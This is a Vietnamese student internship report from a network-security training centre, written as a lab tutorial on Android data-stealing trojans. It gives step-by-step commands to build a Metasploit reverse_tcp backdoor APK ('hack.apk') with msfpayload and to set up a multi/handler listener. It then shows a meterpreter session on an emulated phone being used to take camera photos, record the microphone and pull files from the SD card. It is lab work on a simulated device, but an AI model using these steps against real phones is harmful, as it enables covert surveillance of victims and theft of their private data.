báo cáo tuần 3
DESCRIPTION
Báo cáo thực tập AthenaTRANSCRIPT
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ
ĐỀ TÀI :
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH
SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA
NGOÀI
BÁO CÁO TUẦN 3
GVHD: VÕ ĐỖ THẮNG
SVTH: NGUYỄN THỊ HÀ TIÊN
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
PHẦN 1: THỰC HIỆN TRÊN MẠNG LAN
1.1. Nghiên cứu và cài đặt Kali Linux trên VMware 1.2. Tạo mã độc trên Kali Linux xâm nhập Android
1.2.1. Tạo mã độc trên Kali Linux
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi
máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử
dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau:
Bấm vào VM Settings... ở thanh lựa chọn của Vmware
Bấm vào Network Adapter và chọn Bridged: connection directly to the
physical network
Trang 1
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
Bấm vào Edit -> Virtual Network Editor...
Trên phần Bridge (connect VMs directly to the external network) chọn
adapter của máy thật
Trang 2
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android
Đầu tiên mở Terminal và gõ dòng lệnh
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.126.130
lport=8080 R > /root/Desktop/hack.apk
Trang 3
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
192.168.126.130 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig
để xem IP của máy Kali
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử
dụng
Lệnh trên sẽ tạo ra 1 file hack.apk trên desktop của Kali, đây chính là một
Metasploit reverse tcp backdoor.
Trang 4
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsole load xong, ta tạo một handler để xử lí dữ liệu truyền về
bằng cách gõ lệnh sau:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
Trang 5
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
set lhost 192.168.126.130 – nhập địa chỉ IP giống với khi tạo payload ở
trên.
set lport 8080 – nhập port giống với port khi tạo payload ở trên.
Exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
Thử với một máy Samsung Galaxy S3 giả lập, tải về hack.apk, cài đặt và
mở lên được giao diện như dưới, nhấp vào nút reverse_tcp
Trang 6
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như
sau:
Trang 7
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
Để xem thông tin về máy, nhập lệnh SysInfo
1.2.2. Thực hiện khai thác dữ liệu trong SDcard
a. Sử dụng camera
Để xem danh sách camera, nhập webcam_list
Trang 8
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
Để chụp hình bằng camera, nhập webcam_snap x với x là ID của camera
xem ở danh sách camera ở phần trước. Ví dụ như sau:
File hình đã chụp từ camera của máy android là GBgAyecQ.jpg được lưu
ở /root của máy
b. Ghi âm
Trang 9
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về
máy
c. Lấy file từ SDcard
Để vào SDcard, nhập lệnh cd /sdcard và lệnh ls để xem danh sách file, thư
mục
Trang 10
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
Ví dụ ở đây, ta tải file hack-1.apk trong thư mục download của SDcard
Trang 11
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
Dùng lệnh cd /sdcard/Download để vào thư mục
Trang 12
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
Như trên hình, ta thấy 2 file là hack-1.apk và hack.apk, để tải hack-1.apk
về máy, ta nhập lệnh
Download hack-1.apk
Và file này sẽ được tải về thư mục root của máy Kali
Trang 13
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
Trang 14